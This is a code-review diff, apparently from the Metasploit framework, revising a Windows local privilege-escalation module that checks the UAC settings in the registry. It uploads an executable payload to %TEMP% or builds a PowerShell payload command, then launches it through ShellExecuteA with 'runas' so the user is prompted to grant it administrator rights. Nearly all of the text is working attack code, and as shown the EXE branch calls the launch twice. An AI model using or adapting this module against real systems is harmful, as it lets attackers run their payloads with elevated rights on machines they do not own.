Updated with comments from jlee-r7 and Meatballs1

Added fail_with instead of just print_error
figured a way to execute the cmd_psh_payload with out using gsub
added case statment for datastore['TECHNIQUE']

Author: jamesbcook

modules/exploits/windows/local/ask.rb

@@ -42,14 +42,13 @@ def initialize(info={})
     register_options([
       OptString.new("FILENAME", [ false, "File name on disk"]),
       OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
-      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]),
+      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),
       OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
     ])
 
   end
 
   def exploit
-
     root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
     open_key = session.sys.registry.open_key(root_key, base_key)
     lua_setting = open_key.query_value('EnableLUA')
@@ -63,56 +62,38 @@ def exploit
     uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
 
     case uac_level.data
-    when 2
-      print_status "UAC is set to 'Always Notify'"
-      print_status "The user will be prompted, wait for them to click 'Ok'"
-    when 5
-      print_debug "UAC is set to Default"
-      print_debug "The user will be prompted, wait for them to click 'Ok'"
-    when 0
-      print_good "UAC is not enabled, no prompt for the user"
+      when 2
+        print_status "UAC is set to 'Always Notify'"
+        print_status "The user will be prompted, wait for them to click 'Ok'"
+      when 5
+        print_debug "UAC is set to Default"
+        print_debug "The user will be prompted, wait for them to click 'Ok'"
+      when 0
+        print_good "UAC is not enabled, no prompt for the user"
     end
 
-
     #
     # Generate payload and random names for upload
     #
-
-    if datastore["TECHNIQUE"] == "EXE"
-      if datastore["UPLOAD"]
-        exe_payload = generate_exe_payload_exe
-
-        if datastore["FILENAME"]
-          payload_filename = datastore["FILENAME"]
-        else
-          payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
-        end
-
-        if datastore["PATH"]
-          payload_path = datastore["PATH"]
-        else
-          payload_path = session.fs.file.expand_path("%TEMP%")
-        end
-
+    case datastore["TECHNIQUE"]
+      when "EXE"
+        exe_payload = generate_payload_exe
+        payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+        payload_path = datastore["PATH"] || expand_path("%TEMP%")
         cmd_location = "#{payload_path}\\#{payload_filename}"
-
         if datastore["UPLOAD"]
           print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
-          fd = session.fs.file.new(cmd_location, "wb")
-          fd.write(exe_payload)
-          fd.close
+          write_file(cmd_location, exe_payload)
+        else
+          #print_error("No Upload Path!")
+          fail_with(Exploit::Failure::BadConfig, "No Upload Path!")
+          return
         end
-
-        session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
-      else
-        print_error("No Upload Path!")
-        return
-      end
-    else
-      command = cmd_psh_payload(payload.encoded)
-      arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","")
-      session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5)
+        command, args = cmd_location,nil
+        session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
+      when "PSH"
+        command, args = "cmd.exe",  " /c #{cmd_psh_payload(payload.encoded)}"
     end
+    session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
   end
-end
-
+end